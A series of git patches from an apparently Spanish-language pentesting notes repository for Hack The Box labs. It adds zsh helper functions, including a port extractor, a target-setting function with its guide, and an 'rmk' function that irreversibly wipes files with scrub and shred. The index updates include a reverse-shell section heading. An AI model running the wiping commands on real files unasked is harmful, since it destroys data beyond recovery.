+ echo -e "\t[*] Open ports: $ports\n" >> extractPorts.tmp
+ echo $ports | tr -d '\n' | xclip -sel clip
+ echo -e "[*] Ports copied to clipboard\n" >> extractPorts.tmp
+ cat extractPorts.tmp; rm extractPorts.tmp
+}
+
+# Set 'man' colors
+function man() {
+ env \
+ LESS_TERMCAP_mb=$'\e[01;31m' \
+ LESS_TERMCAP_md=$'\e[01;31m' \
+ LESS_TERMCAP_me=$'\e[0m' \
+ LESS_TERMCAP_se=$'\e[0m' \
+ LESS_TERMCAP_so=$'\e[01;44;33m' \
+ LESS_TERMCAP_ue=$'\e[0m' \
+ LESS_TERMCAP_us=$'\e[01;32m' \
+ man "$@"
+}
+
+# fzf improvement
+function fzf-lovely(){
+
+ if [ "$1" = "h" ]; then
+ fzf -m --reverse --preview-window down:20 --preview '[[ $(file --mime {}) =~ binary ]] &&
+ echo {} is a binary file ||
+ (bat --style=numbers --color=always {} ||
+ highlight -O ansi -l {} ||
+ coderay {} ||
+ rougify {} ||
+ cat {}) 2> /dev/null | head -500'
+
+ else
+ fzf -m --preview '[[ $(file --mime {}) =~ binary ]] &&
+ echo {} is a binary file ||
+ (bat --style=numbers --color=always {} ||
+ highlight -O ansi -l {} ||
+ coderay {} ||
+ rougify {} ||
+ cat {}) 2> /dev/null | head -500'
+ fi
+}
+
+function rmk(){
+ scrub -p dod $1
+ shred -zun 10 -v $1
+}
+
+# Función Settarget:
+
+function settarget(){
+ ip_address=$1
+ machine_name=$2
+ echo "$ip_address $machine_name" > /home/firox/.config/bin/target
+}
+
+# Finalize Powerlevel10k instant prompt. Should stay at the bottom of ~/.zshrc.
+(( ! ${+functions[p10k-instant-prompt-finalize]} )) || p10k-instant-prompt-finalize
From f47c9f26817c33dcfd21f812b67ab221d75d2285 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 14:08:45 +0200
Subject: [PATCH 0259/1701] Create Settarget.md
---
Linux/ZSH/Settarget.md | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 Linux/ZSH/Settarget.md
diff --git a/Linux/ZSH/Settarget.md b/Linux/ZSH/Settarget.md
new file mode 100644
index 00000000000..80987de24cd
--- /dev/null
+++ b/Linux/ZSH/Settarget.md
@@ -0,0 +1,28 @@
+# SetTarget
+
+Mediante la siguiente función podremos colocar el nombre y la Ip de las máquinas que estamos realizando en la polybar.
+
+ function settarget(){
+ ip_address=$1
+ machine_name=$2
+ echo "$ip_address $machine_name" > /home/tuUsuario/.config/bin/target
+ }
+
+
+Para poder tener esta funcion activa simpmente tendremos que pegar la funcion en el archivo `.bashrc` o `.zshrc` dependiendo de si estamos utilizando
+una shell Bash o Zsh. En mi caso utilizo Zsh, asi que nos dirigimos al archivo `.zshrc`.
+
+Copiamos la función. Nos dirigimos hasta nuestro directorio de usuario `/home/Usuario` (Usuario es el vuestro) y mediante el comando `nano` abrimos el archivo y lo pegamos.
+
+ nano .zshrc
+
+Una vez pegado, guardamos con `Cntrl + o` y salimos `Cntrl +x`.
+
+Para ejecutar la función simplemente le especificamos la Ip y el nombre de la máquina de Hack the Box:
+
+ settarget [Ip Máquina] [Nombre de la Máquina]
+
+En caso de no ejecutarse mediante `root`. Nos registramos como `roo` y repetimos la misma operación.
+
+
+
From c11ff6ad177dbd8da4fa47ce933f72a91ea5f064 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 14:11:43 +0200
Subject: [PATCH 0260/1701] Update ZSH.md
---
Linux/ZSH/ZSH.md | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/Linux/ZSH/ZSH.md b/Linux/ZSH/ZSH.md
index 203865e252b..d080423b905 100644
--- a/Linux/ZSH/ZSH.md
+++ b/Linux/ZSH/ZSH.md
@@ -59,4 +59,8 @@ La ZSH funciona leyendo el archivo `.zshenv` a menos que se especifique el argum
`.zlogin` : Este archivo es similar a .zprofile. No debe contener ningún comando que altere el entorno.
`.zlogout` : Se lee cuando se cierra la sesión de la shell. Puede usarse para configurar los comandos que se ejecutan cuando se cierra el shell.
+
+# Funciones:
+
+### [Función SetTarget](../Linux/ZSH/Settarget.html)
From 461d6bd5adef479188ab148c4b64a30c54b84c4c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 14:13:12 +0200
Subject: [PATCH 0261/1701] Update index.md
---
index.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 3c7ee2c82ed..ecec082e121 100644
--- a/index.md
+++ b/index.md
@@ -38,7 +38,8 @@ Herramientas útiles para la fase de reconocimiento, como reportes de SO o recop
1.[Nmap](../Herramientas_y_Scripts/Nmap.html)
2.[WichSystem](./Herramientas_y_Scripts/WichSystem.html)
3.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
-4.[mkt](./Herramientas_y_Scripts/mkt.html)
+4.[mkt](./Herramientas_y_Scripts/mkt.html)
+5.[SetTarget](./Linux/ZSH/Settarget.html)
## Shells:
Herramientas para crear shells inversas.
From e34e84e97e9a0f5880881e077bb0bfcda1fe00c4 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 14:15:25 +0200
Subject: [PATCH 0262/1701] Update Settarget.md
---
Linux/ZSH/Settarget.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Linux/ZSH/Settarget.md b/Linux/ZSH/Settarget.md
index 80987de24cd..8ddf4ff4953 100644
--- a/Linux/ZSH/Settarget.md
+++ b/Linux/ZSH/Settarget.md
@@ -16,13 +16,13 @@ Copiamos la función. Nos dirigimos hasta nuestro directorio de usuario `/home/U
nano .zshrc
-Una vez pegado, guardamos con `Cntrl + o` y salimos `Cntrl +x`.
+Una vez pegado, guardamos con `Cntrl + o` y salimos `Cntrl + x`.
Para ejecutar la función simplemente le especificamos la Ip y el nombre de la máquina de Hack the Box:
settarget [Ip Máquina] [Nombre de la Máquina]
-En caso de no ejecutarse mediante `root`. Nos registramos como `roo` y repetimos la misma operación.
+En caso de no ejecutarse mediante `root`. Nos registramos como `root` y repetimos la misma operación.
From 153708e71c9379c36fc363d95fa870b7c81ea72f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 14:46:38 +0200
Subject: [PATCH 0263/1701] Update Settarget.md
---
Linux/ZSH/Settarget.md | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/Linux/ZSH/Settarget.md b/Linux/ZSH/Settarget.md
index 8ddf4ff4953..5e8eff8546d 100644
--- a/Linux/ZSH/Settarget.md
+++ b/Linux/ZSH/Settarget.md
@@ -1,5 +1,8 @@
# SetTarget
+
+
+
Mediante la siguiente función podremos colocar el nombre y la Ip de las máquinas que estamos realizando en la polybar.
function settarget(){
@@ -12,6 +15,8 @@ Mediante la siguiente función podremos colocar el nombre y la Ip de las máquin
Para poder tener esta funcion activa simpmente tendremos que pegar la funcion en el archivo `.bashrc` o `.zshrc` dependiendo de si estamos utilizando
una shell Bash o Zsh. En mi caso utilizo Zsh, asi que nos dirigimos al archivo `.zshrc`.
+
+
Copiamos la función. Nos dirigimos hasta nuestro directorio de usuario `/home/Usuario` (Usuario es el vuestro) y mediante el comando `nano` abrimos el archivo y lo pegamos.
nano .zshrc
@@ -21,6 +26,8 @@ Una vez pegado, guardamos con `Cntrl + o` y salimos `Cntrl + x`.
Para ejecutar la función simplemente le especificamos la Ip y el nombre de la máquina de Hack the Box:
settarget [Ip Máquina] [Nombre de la Máquina]
+
+
En caso de no ejecutarse mediante `root`. Nos registramos como `root` y repetimos la misma operación.
From fa631d00c01b938b04bdce965581fc3c3e692e4f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 16:40:08 +0200
Subject: [PATCH 0264/1701] Update index.md
---
index.md | 10 ++++++++--
1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/index.md b/index.md
index ecec082e121..ca8a601dfb4 100644
--- a/index.md
+++ b/index.md
@@ -77,8 +77,14 @@ Escaneo de vulnerabilidades en páginas WordPress.
---
-
-
+
+
From 0c181ed17b871f2dff52bf74e2aa4ec2635d07f9 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Tue, 10 May 2022 16:45:07 +0200
Subject: [PATCH 0265/1701] Update index.md
---
index.md | 16 +++++++++-------
1 file changed, 9 insertions(+), 7 deletions(-)
diff --git a/index.md b/index.md
index ca8a601dfb4..10fc8cf9934 100644
--- a/index.md
+++ b/index.md
@@ -77,14 +77,16 @@ Escaneo de vulnerabilidades en páginas WordPress.
---
-
-
+